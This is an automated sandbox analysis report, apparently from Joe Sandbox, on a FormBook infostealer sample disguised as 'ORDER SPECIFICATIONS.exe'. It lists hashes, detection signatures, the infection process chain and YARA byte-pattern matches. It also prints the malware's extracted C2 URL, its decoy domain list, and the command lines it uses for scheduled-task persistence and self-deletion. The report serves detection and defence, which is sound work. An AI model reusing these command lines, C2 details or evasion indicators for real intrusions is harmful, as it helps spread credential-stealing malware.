Play interactive tour

Edit tour

Analysis Report ORDER SPECIFICATIONS.exe

Overview

General Information

Sample Name:	ORDER SPECIFICATIONS.exe
Analysis ID:	356492
MD5:	e75a4df51162401b21c3eb79718fb3db
SHA1:	3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256:	48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

ORDER SPECIFICATIONS.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: E75A4DF51162401B21C3EB79718FB3DB)

schtasks.exe (PID: 6476 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ORDER SPECIFICATIONS.exe (PID: 6520 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)

ORDER SPECIFICATIONS.exe (PID: 6552 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

chkdsk.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cmd.exe (PID: 5308 cmdline: /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x254558:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2548e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x27b778:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x27bb02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2605f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x287815:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2600e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x287301:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2606f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x287917:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x26086f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x287a8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2552fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x27c51a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x25f35c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x28657c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x256072:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x27d292:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2656e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x28c907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x26678a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x262619:$sqlite3step: 68 34 1C 7B E1 0x26272c:$sqlite3step: 68 34 1C 7B E1 0x289839:$sqlite3step: 68 34 1C 7B E1 0x28994c:$sqlite3step: 68 34 1C 7B E1 0x262648:$sqlite3text: 68 38 2A 90 C5 0x26276d:$sqlite3text: 68 38 2A 90 C5 0x289868:$sqlite3text: 68 38 2A 90 C5 0x28998d:$sqlite3text: 68 38 2A 90 C5 0x26265b:$sqlite3blob: 68 53 D8 7F 8C 0x262783:$sqlite3blob: 68 53 D8 7F 8C 0x28987b:$sqlite3blob: 68 53 D8 7F 8C 0x2899a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: ORDER SPECIFICATIONS.exe PID: 6336	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1204b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x120842:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1476d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x147a62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12c555:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x153775:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12c041:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x153261:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c657:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x153877:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12c7cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1539ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12125a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14847a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12b2bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1524dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x121fd2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1491f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x131647:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x158867:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1326ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x12e579:$sqlite3step: 68 34 1C 7B E1 0x12e68c:$sqlite3step: 68 34 1C 7B E1 0x155799:$sqlite3step: 68 34 1C 7B E1 0x1558ac:$sqlite3step: 68 34 1C 7B E1 0x12e5a8:$sqlite3text: 68 38 2A 90 C5 0x12e6cd:$sqlite3text: 68 38 2A 90 C5 0x1557c8:$sqlite3text: 68 38 2A 90 C5 0x1558ed:$sqlite3text: 68 38 2A 90 C5 0x12e5bb:$sqlite3blob: 68 53 D8 7F 8C 0x12e6e3:$sqlite3blob: 68 53 D8 7F 8C 0x1557db:$sqlite3blob: 68 53 D8 7F 8C 0x155903:$sqlite3blob: 68 53 D8 7F 8C
0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd0898:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd0c22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf7ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf7e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xdc935:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x103b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xdc421:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x103641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xdca37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x103c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xdcbaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x103dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd163a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf885a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xdb69c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1028bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd23b2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf95d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xe1a27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x108c47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe2aca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xde959:$sqlite3step: 68 34 1C 7B E1 0xdea6c:$sqlite3step: 68 34 1C 7B E1 0x105b79:$sqlite3step: 68 34 1C 7B E1 0x105c8c:$sqlite3step: 68 34 1C 7B E1 0xde988:$sqlite3text: 68 38 2A 90 C5 0xdeaad:$sqlite3text: 68 38 2A 90 C5 0x105ba8:$sqlite3text: 68 38 2A 90 C5 0x105ccd:$sqlite3text: 68 38 2A 90 C5 0xde99b:$sqlite3blob: 68 53 D8 7F 8C 0xdeac3:$sqlite3blob: 68 53 D8 7F 8C 0x105bbb:$sqlite3blob: 68 53 D8 7F 8C 0x105ce3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' , ParentImage: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe, ParentProcessId: 6336, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', ProcessId: 6476

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\LvZiFDk.exe

ReversingLabs: Detection: 14%

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER SPECIFICATIONS.exe	Virustotal: Detection: 30%			Perma Link
Source: ORDER SPECIFICATIONS.exe	ReversingLabs: Detection: 14%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
